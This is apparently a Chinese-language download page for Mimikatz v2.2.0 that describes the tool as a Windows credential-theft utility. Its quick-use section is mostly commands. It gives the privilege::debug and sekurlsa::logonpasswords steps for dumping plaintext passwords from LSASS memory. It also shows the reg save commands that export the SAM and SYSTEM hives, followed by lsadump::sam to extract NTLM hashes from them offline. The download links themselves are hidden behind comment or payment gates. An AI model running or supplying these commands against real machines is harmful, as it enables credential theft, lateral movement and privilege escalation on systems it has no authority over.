简介

Mimikatz是一款功能强大的Windows安全工具，主要用于演示Windows身份认证机制中的安全漏洞。它能够从系统的内存中提取明文密码、哈希值、票据（如Kerberos TGT）以及其他敏感认证数据，尤其擅长攻击LSASS（本地安全机构子系统服务）进程。由于其高效的凭据窃取能力，Mimikatz已成为渗透测试和攻击中广泛使用的工具，常被用于横向移动、权限提升和特权维持。

演示视频

快速使用

在线使用

在线使用即：Mimikatz在提取目标的机器上运行。

以管理员启动mimikatz，并且启用调试

privilege::debug

提取本地明文密码

sekurlsa::logonpasswords

离线使用

离线使用即：Mimikatz无法提取目标的机器上运行，但可以在目标机器上提取本地 NTLM 哈希文件，然后在本地使用mimikatz对提取的NTLM 哈希文件进行密码提取。

使用命令导出离线 hive 文件到C盘

reg save HKLM\SAM C:\sam.save
reg save HKLM\SYSTEM C:\system.save

使用 Mimikatz 对导出的 hive 文件进行密码解析

lsadump::sam /sam:sam.save /system:system.save

下载

极核始终提供一条免费的直链下载通道！
为防止恶意爬取下载，请登录并回复后下载！

✈️ 全球下载通道

此处内容已隐藏，请评论后刷新页面查看.

🚀 极核加速通道

此处内容已隐藏，请付费后查看

THE END

实用工具
# 权限工具 # 内网工具

【凭据提取】mimikatz v2.2.0

简介